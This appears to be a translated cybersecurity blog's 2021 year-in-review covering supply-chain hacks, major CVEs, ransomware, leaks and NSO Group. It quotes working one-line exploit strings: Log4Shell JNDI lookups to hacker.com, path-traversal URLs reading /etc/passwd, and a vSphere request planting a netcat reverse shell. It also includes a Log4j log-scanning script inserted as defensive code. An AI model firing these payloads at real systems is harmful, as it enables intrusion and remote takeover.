The Arbitrary Top of the Year 2021


As this is a "top", the goal is not to detail each subject; for that, I refer you to the OSSIR news reviews, in PDF and video (https://www.ossir.org/support-des-presentations/?date=2021).

2020

Let's get to the heart of the matter: 2020 was quite catastrophic, with major data leaks, large-scale vendor compromises, major vulnerabilities...

I ended the year with this meme accompanying my greetings:

The main question then is "what was the year 2021?"

A hint: I had started the year with this edit 😂 :

2021, another year of vendor compromise?

So-called "supply chain" attacks are old, but they have become increasingly common in recent years.

Remember the hacks of:

  • Juniper in 2015, with the addition of a hard-coded password that authenticated in place of any user, which caused the stock price to plummet;
  • CCleaner in 2017, with malware added to a specific version of the tool, installed automatically wherever automatic updates were enabled;
  • The Ukrainian vendor MEDoc in 2017, with the famous NotPetya attack destroying the information systems of Saint-Gobain, Maersk...;
  • The vendor NetSarang in 2017 (server management tools), with the addition of a backdoor named ShadowPad;
  • ASUS in 2019, with malicious, yet signed, updates pushed to ASUS laptops;
  • ...

2021 confirmed this trend with more and more hacks.

In 2021, we had the aftermath of the SolarWinds hack, which led to the compromise of thousands of U.S. agencies, Microsoft, FireEye...:

  • Confirmation of the Qualys, MalwareBytes, Mimecast and Palo Alto Networks compromises (2021-02-09 review)
  • Confirmation of the NASA and FAA compromises (2021-03-09 review)
  • "It's not our fault, it's the intern!" (2021-03-09 review)

In 2021, we had the hacks of:

  • Stormshield, with the leak of the source code of the SNS and SNI firewalls, and the ANSSI placing the qualifications and approvals of those products under observation (2021-02-09 review)
  • More than 30,000 American administrations through the ProxyLogon vulnerability affecting Microsoft Exchange, which we will come back to just after (2021-03-09 review)
  • Many companies using Centreon, a network monitoring tool (2021-03-09 review)
  • Codecov, a code analysis tool used by more than 9,000 open source projects (2021-05-13 review)

In 2021, as in previous years, we had deployments of rogue libraries:

  • "npm run for your lives", with the release of packages spoofing the names of packages used internally at Apple, Amazon, Yelp, Microsoft, Slack... (2021-03-09 review)
  • More and more malicious libraries on PyPI (2021-12-12 review)
  • Again and again backdoored libraries on npm, this time through the hacking of a maintainer's account (2021-11-09 review)

2021, again a year of major vulnerabilities? #VulnsMajeures

The situation seems to be getting worse and worse, and this is partly true, for three main reasons:

  1. There are more and more vulnerabilities because more and more people, tools, companies... are looking for them. So, statistically, there are more critical vulnerabilities;
  2. Widely used software packages are few (they are often the same ones), and with everything (or almost everything) connected to the Internet, a critical vulnerability in one of them impacts hundreds of thousands or even millions of companies, local authorities, government agencies, individuals...;
  3. Finally, we are all talking about it much more than before, and to a wider audience, which makes these vulnerabilities more visible.

2021 confirmed this trend with more major vulnerabilities having major impacts.

Moreover, this year concluded with Log4J which is definitely characteristic of 2021.

In 2021, we had the real fix for ZeroLogon, a vulnerability that allows an attacker to instantly become an administrator of a Microsoft Active Directory domain (2021-02-09 review):

CVE-2020-1472; massively exploited in the wild; CVSS=10.0/10 (as a reminder, the CVSS score rates the technical criticality of a vulnerability from 0 to 10, a score above 9 being the end of the world 😊)

In 2021, we had Microsoft Exchange, the email server software, back in fashion (for attackers) and packed with major vulnerabilities:

  • ProxyLogon, remote takeover without authentication (2021-03-09 review):
    ○ CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065; massively exploited in the wild; CVSS=10.0/10
    ○ Found by Orange Tsai
    ○ Remediated in the wild by the FBI, directly on U.S. companies' servers (2021-05-13 review)
  • Full retrieval of a mailbox without authentication (2021-04-13 review): CVE-2021-26855; CVSS=9.1/10
  • ProxyOracle, an old-fashioned "padding oracle" (2021-03-09 review):
    ○ CVE-2021-31196, CVE-2021-31195; CVSS=7.2/10
    ○ Found by Orange Tsai
    ○ Deserves its place in #VulnsOfThe90s
  • 4 remote takeovers without authentication (2021-09-14 review):
    ○ CVE-2021-28480, CVE-2021-28481, CVE-2021-28482, CVE-2021-28483; CVSS=9.8/10
    ○ One of which was reported by the NSA
  • ProxyShell, remote takeover without authentication (2021-09-14 review):
    ○ CVE-2021-34473, CVE-2021-34523, CVE-2021-31207; massively exploited in the wild; CVSS=10.0/10
    ○ Submitted to Pwn2Own

In 2021, Microsoft Azure Cosmos DB (with Jupyter Notebook) saw the leak of Cosmos DB keys from all Notebooks, allowing data to be stolen from all databases of all customers (2021-09-14 review).

In 2021, virtualization leader VMware suffered major vulnerabilities in its flagship products, sometimes exposed directly on the Internet 🤦‍♂️ :

  • vSphere, remote takeover without authentication (2021-03-09 review): CVE-2021-21972 and CVE-2021-21973; massively exploited in the wild; CVSS=9.8/10
  • vSphere, remote takeover without authentication (2021-10-12 review): CVE-2021-22005; massively exploited in the wild; CVSS=9.8/10
  • vCenter, the hypervisor management software, vulnerable to remote takeover without authentication (2021-10-12 review): CVE-2021-21972; massively exploited in the wild; CVSS=9.8/10

In 2021, the vendor Palo Alto Networks also suffered a remote takeover without authentication (2021-12-12 review):

CVE-2021-3064; exploited in the wild; CVSS=9.8/10
Would also deserve its place in #VulnsCyberSec
A vulnerability causing a triple "bad buzz":
    ▹ Discovered by the US pentesting company Randori, who kept it under wraps for a year, which is unethical
    ▹ Palo Alto discreetly modified its security bulletin to make it look like it had fixed the vulnerability a year earlier
    ▹ Palo Alto... does not pay researchers who report vulnerabilities to it

In 2021, Bloomberg published an article about the 3 hacks of Juniper (router and firewall vendor) that led to the addition of backdoors by (2021-09-14 review):

  • The Americans in 2008
  • The Chinese in 2012
  • Again the Chinese in 2014

And since then? Good question 😉.

In 2021, GitLab CE, the source code management and software factory (CI/CD pipeline) software, was vulnerable to a remote takeover without authentication (2021-11-09 review):

CVE-2021-22205; exploited in the wild; CVSS=10.0/10
Stemming from a vulnerability in the "ExifTool" image metadata tool (CVE-2021-22204).

Let's take a quick look at what you use the most, and for which hundreds of vulnerabilities were fixed in 2021:

  • Browsers (all reviews 😉):
    ○ Chrome: 309, including 48 high or critical
    ○ Firefox: 121, of which 52 high or critical
    ○ Microsoft Edge: 26 (including 2 critical)
    ○ Microsoft Edge Chromium: many (including at least 50 high or critical)
  • Smartphones (all reviews 😉):
    ○ Android: 574, including 151 high or critical
    ○ iOS: 336, including 234 high or critical

We will come back to iOS in the legal part, with the "NSO Group" case.

And finally, the one you were all waiting for, because it spoiled our Christmas vacations: Log4J 🥳🎉, the logging library, with a remote takeover without authentication (2021-12-12 review):

  • A story starting with Minecraft players hacking other players;
  • A story affecting the whole planet;
  • A never-ending story with a sequence of patches and new vulnerability discoveries:
    ○ Version 2.14, CVE-2021-44228; massively exploited in the wild; CVSS=10.0/10 (example exploit: ${jndi:ldap://hacker.com:389/a})
    ○ Version 2.15, CVE-2021-45046; exploited in the wild; CVSS=9.0/10 (example exploit: ${jndi:ldap://127.0.0.1#hacker.com:389/a})
    ○ Version 2.16, CVE-2021-45105; exploited in the wild; CVSS=5.9/10 (example exploit: {${::-${::-$.${::-j}}}})
    ○ Version 2.17, CVE-2021-44832; CVSS=6.6/10 (if the attacker can modify the configuration file and add a JNDI path in the JDBCAppender, so unlikely 😉)
  • A story in which we have to thank SwitHak for maintaining a list of all impacted vendors, followed by the Dutch CERT (NCSC-NL)
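The lookup strings quoted above are what a defender has to find in web-server and application logs, usually hidden behind nested ${lower:j} or ${::-j} lookups so that a plain search for "jndi" misses them. The scanner below is an added example written for this post (not code from the original post or from the Log4j project): it resolves the three simple lookup forms (${lower:x}, ${upper:x}, ${::-x}) inside-out before matching, measures how deeply lookups are nested (the property the CVE-2021-45105 string relies on), and runs over a few constructed log lines. The nesting threshold and the sample lines are assumptions made for the example.

```python
import re

# Innermost lookups of the three simple forms. The value may contain '$'
# but no braces, so nested lookups are resolved from the inside out.
_SIMPLE_LOOKUP = re.compile(r"\$\{(lower:|upper:|::-)([^{}]*)\}", re.IGNORECASE)


def normalize_lookups(text, max_rounds=50):
    """Resolve ${lower:..}, ${upper:..} and ${::-..} until nothing changes."""
    def resolve(match):
        kind, value = match.group(1).lower(), match.group(2)
        if kind == "lower:":
            return value.lower()
        if kind == "upper:":
            return value.upper()
        return value  # "::-" is an empty lookup whose default value is used
    for _ in range(max_rounds):
        updated = _SIMPLE_LOOKUP.sub(resolve, text)
        if updated == text:
            break
        text = updated
    return text


def max_lookup_depth(text):
    """Deepest nesting of ${...} in the raw (un-normalized) text."""
    depth = deepest = 0
    i = 0
    while i < len(text):
        if text.startswith("${", i):
            depth += 1
            deepest = max(deepest, depth)
            i += 2
            continue
        if text[i] == "}" and depth > 0:
            depth -= 1
        i += 1
    return deepest


# Assumption for this example: three nested lookups (the CVE-2021-45105
# string above) is enough to flag a line even when no jndi: appears.
NESTING_THRESHOLD = 3


def classify(line):
    """Return (has_jndi, depth) for one log line."""
    normalized = normalize_lookups(line)
    has_jndi = "${jndi:" in normalized.lower()
    return has_jndi, max_lookup_depth(line)


def scan(lines):
    """Return (line_no, verdict, line) for suspicious lines only."""
    findings = []
    for n, line in enumerate(lines, 1):
        has_jndi, depth = classify(line)
        if has_jndi:
            findings.append((n, "jndi-lookup", line))
        elif depth >= NESTING_THRESHOLD:
            findings.append((n, "nested-lookup", line))
    return findings


# Constructed sample log lines (not real traffic); the lookup strings are
# the ones quoted in the post above.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://hacker.com:389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:ldap://127.0.0.1#hacker.com:389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "{${::-${::-$.${::-j}}}}"',
]

if __name__ == "__main__":
    for n, verdict, line in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}: {line}")
```

Run as a script, it reports lines 2 and 3 as jndi-lookup (the second only after the ${lower:j} is resolved) and line 4 as nested-lookup. A production scanner would also resolve ${env:...}, ${sys:...} and the other lookups Log4j supports; the inside-out normalization shown here is the part that plain pattern matching gets wrong.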

2021, a confirmation that security products are full of vulnerabilities? #VulnsCyberSec

From what I remember, it was around 2014-2015 that people started to realize that cybersecurity products were software like any other: stuffed with vulnerabilities.

I remember in particular the work of Tavis Ormandy, who found critical vulnerabilities in the most famous antivirus products.

2021 was a continuation of the previous years. In 2021, we saw vulnerabilities in security solutions from the vendor Fortinet:

  • FortiWeb, application firewall (WAF), with remote takeovers without authentication (2021-02-09 review):
    ○ CVE-2020-29016 and CVE-2020-29019 (buffer overflow), CVE-2020-29015 (SQL injection)...; exploited in the wild; CVSS=9.8/10
  • FortiWan, with a remote takeover without authentication (2021-05-13 review):
    ○ CVE-2021-26102; exploited in the wild; CVSS=9.8/10

In 2021, again, Palo Alto Networks firewalls had a remote takeover without authentication on the Telnet service (2021-03-09 review):
    ○ CVE-2020-10188; CVSS=8.1/10

In 2021, IBM QRadar, the log analysis (SIEM) software, suffered a remote takeover without authentication (2021-02-09 review):
    ○ CVE-2020-4888; CVSS=8.8/10

In 2021, SonicWall VPN remote access solutions were vulnerable to remote takeover without authentication (2021-05-13 review):
    ○ CVE-2021-20021, CVE-2021-20022, CVE-2021-20023; massively exploited in the wild; CVSS=7.2/10, but the 3 chained together are more like 10.0/10
    ○ CVE-2021-20034 (admin password reset without authentication); exploited in the wild; CVSS=9.1/10

In 2021, as in previous years, Pulse Secure remote access solutions were vulnerable to a remote takeover without authentication (2021-05-13 review):
    ○ CVE-2021-22893; massively exploited in the wild; CVSS=10.0/10
    ○ Exploited since summer 2020 but fixed in May 2021 😱

And all the others:

  • F5, with dozens of vulnerabilities allowing remote takeover without authentication (2021-04-13 review)
  • Cisco, with hundreds of vulnerabilities resulting in remote takeover without authentication (all reviews 😉)

2021, a confirmation that today's vulnerabilities strongly resemble those of the 90s? #VulnsOfThe90s

"The 90s just called, they want their vulnerabilities back..."

When we look at some of the 2021 vulnerabilities, their technical nature and the triviality with which they can be exploited, we are tempted to draw a parallel with the beginnings of the Internet in the 90s-2000s and the almost total absence of security. Microsoft seems to be a specialist in the discipline:

  • PrintNightmare, the summer 2021 soap opera with a flurry of incomplete patches and print spooler vulnerabilities (2021-09-14 review):
    ○ CVE-2021-1675, CVE-2021-34527, CVE-2021-36936, CVE-2021-36958; massively exploited in the wild; CVSS=8.8/10
  • SigRed, the notorious remote takeover without authentication of Windows DNS servers via a simple SIG-type DNS query (2021-03-09 review):
    ○ CVE-2020-1350; massively exploited in the wild; CVSS=10.0/10
  • SeriousSAM or HiveNightmare, Microsoft's incredible mistake regarding the permissions on the Windows SAM password database (2021-09-14 review):
    ○ CVE-2021-36934; exploited in the wild; CVSS=7.8/10
  • PetitPotam or EfsPotato, allowing an attacker to obtain an AD domain account without authentication, pure joy for slackers and cybercriminals (2021-09-14 review):
    ○ CVE-2021-36942; exploited in the wild; CVSS=7.5/10
  • Local (and trivial) elevation of privileges through the installation of the Razer mouse driver (2021-11-09 review)
  • Corruption of the Windows file system (NTFS partition) just by trying to access C:\:$i30:$bitmap (2021-02-09 review)
  • Denial of service (DoS) on Windows by a simple IPv6 packet routable over the Internet (2021-03-09 review):
    ○ CVE-2021-24806; exploited in the wild; CVSS=7.5/10

Microsoft Azure also had its 90s vulnerability with OMIGOD, the agent deployed on all Azure Cloud instances without customers' knowledge and allowing remote takeover without authentication (2021-10-12 review):
    ○ CVE-2021-38647; exploited in the wild; CVSS=9.8/10

The Unicode Left-To-Right Override character and its friends (LRE, RLE, LRO, RLO) made a comeback, to hide backdoors in source code (2021-09-14 review).

The 90s vulnerabilities are also "path traversal", i.e. triggered by just sending "/../../":

  • Grafana (2021-12-12 review):
    ○ CVE-2021-43798; CVSS=7.5/10
    ○ With a simple: "http://cible:3000/public/plugins/loki/../../../../../../../../etc/passwd"
  • VMware vSphere, already seen above (2021-10-12 review):
    ○ CVE-2021-22005; massively exploited in the wild; CVSS=9.8/10
    ○ With a simple: "https://cible/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM -H Content-Type: -d "* * * * * root nc -e /bin/sh IP-SHELLBACK 4444"
  • Atlassian Jira Server (2021-10-12 review):
    ○ CVE-2021-26086; exploited in the wild; CVSS=5.3/10
    ○ With a simple "http://cible/s/cfx/_/;/WEB-INF/web.xml" or "http://cible/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"
  • Apache HTTPD, with the remote takeover without authentication whose first patch was bypassed (2021-10-12 review):
    ○ CVE-2021-41773 then CVE-2021-42013; massively exploited in the wild; CVSS=7.5/10
    ○ With a simple http://cible/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
    ○ Whose first patch was bypassed by "http://cible/cgi-bin/..;/..;/..;/..;/..;/etc/passwd" or "http://cible/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd"

And I'm not even going to talk about SOHO routers, those network boxes for small companies or individuals that do WiFi, Internet access... and are full of trivial vulnerabilities (2021-03-09 review).

2021, again the year of ransomware, in the continuity of 2018, 2019 and 2020?

This cybercriminal business model does not seem to be slowing down (all reviews 😉), with some outstanding or out of the ordinary facts:

  • The REvil group started targeting insurers to find new targets (2021-04-13 review)
  • The Babuk group compromised the Washington D.C. Police Department and threatened to release information about its informants (2021-05-13 review)
  • The DarkSide group (an affiliate) hacked the U.S. Colonial Pipeline and held it to ransom (2021-05-13 review)
  • The Conti group hacked a British diamond dealer and apologized for it (at the request of the Kremlin) after releasing the data, some of which was linked to Mohammed Bin Salman (2021-11-09 review)

2021, an innovation with the hacking of cybersecurity experts?

What could be better than hacking a cybersecurity researcher and stealing their work, including their unpublished vulnerabilities? This is not really new, but in 2021 there were several cases of this type:

  • An espionage campaign (led by North Korea) targeted cybersecurity researchers with fake researcher profiles, fake blogs and booby-trapped Visual Studio projects sent by email (2021-02-09 review)
  • The company Bastion Secure (actually the FIN7 group) published fake job offers to manipulate researchers into carrying out ransomware attacks (2021-11-09 review)

2021, the year of massive data leaks again?

Every year has its data leaks, and 2021 is no exception, with a large number of data leaks or privacy breaches:

  • The Dedalus affair, with the theft and publication of medical data concerning 491,840 French people, including 300,000 Bretons (2021-03-09 review)
  • As every year, Facebook was involved in problems concerning personal data:
    ○ Theft and publication of 533 million accounts (2021-04-13 review)
    ○ A whistleblower exposed abuses and lies (2021-10-12 review)
  • After the leak of password digests in 2012, in 2021 LinkedIn suffered a massive data download (scraping) and publication involving 700 million users (forgotten from the review 😥)
  • A list of 86,939 Fortinet VPN logins and passwords was published (2021-09-14 review)
  • Twitch was hacked, and ALL of its tools 🤯 along with a lot of data were released (2021-10-12 review)
  • After the chaotic release of the game Cyberpunk 2077, CD Projekt was hacked, with the theft of source code and blackmail (2021-03-09 review)
  • Gravatar was hacked, with the leak of 124 million users' data (2021-12-12 review)
  • Finally, in 2021, Wired published an article about Amazon and its lack of respect for its customers' data (2021-12-12 review)

2021, again the year of widespread outages?

A bit like major vulnerabilities, some outages have a very large impact, and every year various web players manage to surprise us with the creativity of their outages, especially the GAFAM/MAGMA, for which this happens regularly:

  • Fastly CDN had a "short" outage with many cascading impacts (2021-09-14 review)
  • Facebook went down due to a BGP problem (2021-10-12 review)
    ○ Still the fault of BGP, "Bridging Gap Protocol" 🤦‍♂️🤦‍♂️🤦‍♂️ according to Sky News
  • Microsoft Azure suffered a mega outage (in October, but forgotten from the review 😥)
  • AWS went down again, multiple times (2021-12-12 review)
  • OVH suffered a fire in the SBG2 datacenter in Strasbourg, caused by a UPS (2021-04-13 review)
  • Google deleted all HackerNews content, including backups (2021-11-09 review)
  • During the transition to 2022, Microsoft Exchange had trouble moving to the new year and all instances crashed (2022-01-11 review)

2021, marked by numerous arrests of cybercriminals?

Fortunately, our law enforcement agencies are not idle and regularly arrest cybercriminals.

2021 was particularly rich in arrests:

  • Egregor operators arrested (2021-03-09 review)
  • The technical brain of the FIN7 group was sentenced to 10 years in prison (2021-05-13 review)
  • 7 members of REvil/GandCrab arrested (2021-11-09 review)
  • Europol carried out some nice operations:
    ○ Arrest of the main members of Emotet, filmed, and it looked like a parody of cybercriminals (2021-02-09 review)
    ○ Arrest of 12 cybercriminals linked to LockerGoga, MegaCortex and Dharma ransomware deployments (2021-11-09 review)
    ○ Operation "HAECHI-II", with the arrest of 1,000 people linked to CEO fraud ("president scams") (2021-12-12 review)
  • The Gendarmerie and Europol arrested more than 150 cybercriminals in Operation "Dark HunTOR" (2021-11-09 review)
  • Many criminals and cybercriminals using Sky ECC (secure smartphones) were arrested (2021-12-12 review)

2021, an innovation in security conferences?

Several cybersecurity-related conferences or events stood out in 2021.

These cybersecurity conferences, events or media include:

  • The Netmask and the Pen 😍😍😍 (2021-09-14 review)
  • Unlock Your Brain 👍, in November, in Brest
  • Barbhack, in August, in Toulon (2021-09-14 review)
  • The Pwned blog on Substack (2021-10-12 review)
  • Tianfu Cup 2021, the Chinese Pwn2Own (2021-11-09 review)
  • Pwn2Own Austin 2021, special printers, routers, smartphones..., with a nice first place for Synacktiv (2021-11-09 review)

2021, particularly marked by business?

Each year sees its share of buyouts, fundraisings, low blows and the creation of interest groups.

2021 was again a particularly rich year in these areas:

  • Tenable bought Alsid for $98m (2021-03-09 review)
  • Datadog bought Sqreen, with Bercy studying the file closely (2021-03-09 review)
  • ThreatQuotient raised $22m (2021-04-13 review)
  • Glimps raised €6m (2021-04-13 review)
  • The list of GAIA-X members (the European Cloud) was published, but made up of very (too) many non-European vendors (2021-04-13 review)
  • CrowdSec raised €5m (2021-05-13 review)
  • FireEye was sold for $1.2 billion (2021-09-14 review)
  • Vade Secure was fined $14m by the US (2021-09-14 review)
    ○ And maybe another $29m (2021-11-09 review)
  • F5 acquired Threat Stack for $68m (2021-10-12 review)
  • Dell and VMware split (2021-11-09 review)

2021, rich in publications of reference systems and guides?

Publications are essential to help raise everyone's level, and some become the reference documents of the field.

The ANSSI published, among others:

  • A reference framework for remote identity verification (2021-03-09 review)
  • Cybersecurity for VSEs/SMEs in 12 questions
  • A "Zero Trust" model (2021-05-13 review)
  • A complete rewrite of its authentication guide 🤩 (2021-10-12 review)

The NSA, too, released its recommendations for implementing Zero Trust, starting with not trusting them 🤣 (2021-03-09 review)

Strong authentication has been mandatory for banks since May 15, 2021, for amounts over €30 (2021-03-09 review)

This year was also particularly marked by legal events:

  • Cyber risk was ranked among the main risks according to the "Davos Forum" (2021-02-09 review)
  • Following changes in WhatsApp's terms of use, people massively migrated to Signal (2021-02-09 review)
    ○ With an increase in the stock price of Signal Advance Inc., totally unrelated to Signal
    ○ And Signal was flooded with messages trying to get users' emails, to offer sexting, camgirls and porn
  • GitHub updated its policy, banning exploits, offensive tools... (2021-05-13 review)
  • Doxxing was made illegal
  • The Chinese government announced it would preempt vulnerabilities found by its citizens (2021-10-12 review)

We'll end with NSO Group and its Pegasus malware.

The Israeli company (long known, and linked to the Khashoggi affair) and its malware were at the heart of one of the biggest espionage cases of recent years, with:

  • The release of a list of 50,000 victims, provided to journalists and containing politicians, a number belonging to Emmanuel Macron, journalists, employees of the U.S. State Department, political opponents, activists in the Sultanate of Bahrain... (2021-03-09 review)
  • The discovery by the general public of so-called "Zero Click" attacks, allowing any smartphone to be hacked even when up to date with the latest security patches (2021-09-14 review)
  • The intervention of Amnesty International and Citizen Lab to analyze the malware and the vulnerabilities used (2021-09-14 review)
  • NSO's blacklisting by the US Department of Commerce (2021-11-09 review)
  • The lawsuit filed by WhatsApp, from which NSO could not escape (2021-11-09 review)
  • Apple's complaint to ban them from using Apple tools, devices... (2021-12-12 review)
  • The resignation of the CEO (2021-12-12 review)


Finally, what seems to me to characterize this year the most is the very large number of vulnerabilities:

  1. With a very high criticality;
  2. Resembling vulnerabilities from the 90s-2000s;
  3. Massively exploited very quickly after the announcement of their existence;
  4. Often affecting open source components included in proprietary software used everywhere;
  5. With multiple incomplete patches or very long correction times.

I keep repeating myself, but what saved many companies was simply good practice, such as strict compartmentalization.

For this new year 2022, I wish you all the best, health, and I hope to see you very soon in front of a good beer 🍻. Happy new year to all.
